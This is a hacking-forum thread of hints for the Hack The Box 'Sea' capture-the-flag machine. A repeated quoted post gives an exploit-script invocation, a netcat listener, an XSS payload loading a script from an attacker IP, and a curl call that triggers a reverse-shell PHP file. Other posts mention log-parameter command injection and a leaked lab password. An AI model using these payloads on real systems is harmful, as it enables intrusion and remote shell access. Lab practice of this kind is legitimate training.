[HTB] Sea - Machine
by RedTeamer - Friday August 9, 2024 at 08:04 PM
#81
not able to decode the hash in bcrypt anyone help p[lz
Reply
#82
Any hits for command injection on root...

amay@sea:~$ curl http://127.0.0.1:8080

Unauthorized accessa
may@sea:~$
Reply
#83
(Aug 10, 2024, 11:21 PM)mhsoraa Wrote: Any hits for command injection on root...

amay@sea:~$ curl http://127.0.0.1:8080

Unauthorized accessa
may@sea:~$

use port forwarding to show website on localhost

(Aug 10, 2024, 11:21 PM)testerlion Wrote: not able to decode the hash in bcrypt anyone help p[lz

find escape character
Reply
#84
FOR ROOT:

on local machine forward the port 8080 by using:
Hidden Content
You must register or login to view this content.

then use burpsuit to intercept the request when analyzing log files.. u can inject code in the log_file param by using for example:
Hidden Content
You must register or login to view this content.

harmless example to avoid spoiling others experience!! ENJOY
Reply
#85
(Aug 10, 2024, 10:46 PM)kewlcat002 Wrote: Machine rooted feel free to DM me if need be

(Aug 10, 2024, 10:56 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:45 PM)OffensiveBias Wrote:
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'


thanks bro

Can you tell me what to do actually I found the daily cron but not able to get what to do
Reply
#86
(Aug 10, 2024, 11:27 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:46 PM)kewlcat002 Wrote: Machine rooted feel free to DM me if need be

(Aug 10, 2024, 10:56 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:45 PM)OffensiveBias Wrote:
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'


thanks bro

Can you tell me what to do actually I found the daily cron but not able to get what to do

Plenty of hints regarding the entire machine in the thread, just start from page 1
Reply
#87
any hints on foothold i found a page /contact.php it does call back my machine but i can't think of any thing to do with it
Reply
#88
(Aug 10, 2024, 11:27 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:46 PM)kewlcat002 Wrote: Machine rooted feel free to DM me if need be

(Aug 10, 2024, 10:56 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:45 PM)OffensiveBias Wrote:
(Aug 10, 2024, 10:41 PM)Witcher09 Wrote:
(Aug 10, 2024, 10:26 PM)Witcher09 Wrote: It is showing send the below link to admin, from where
 some one help me

python3 exploit.py http://sea.htb/ 10.10.xx.xxx xxxx

It willl then tell you 

nc -lvp xxxx
----------------------------

send the below link to admin:

----------------------------
http://sea.htb/"></form><script+src="http://10.10.14.128:8000/xss.js"></script><form+action="

send above to website column in contact.php, after this open another port and use this command curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.xx.xxx&lport=new_port'


thanks bro

Can you tell me what to do actually I found the daily cron but not able to get what to do

Search for or ask chatgpt about command injection using curl and http://localhost:8080 is your way forward. Test for payloads to escape . Eventually you will find it.
Reply
#89
(Aug 10, 2024, 11:35 PM)elburro Wrote: any hints on foothold i found a page /contact.php  it does call back my machine but i can't  think of any thing to do with it

machine is slow, callback comes after some time and then repeats

I still can't find a usable command injection Undecided
"No suspicious traffic patterns detected in /root/flag.txt"

Finaly im root. Interesting box Smile
Reply
#90
I got into amay using password mychemicalromance but stuck to get into root. any hint?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,590 27 minutes ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,944 9 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,799 10 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,616 Today, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,269 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)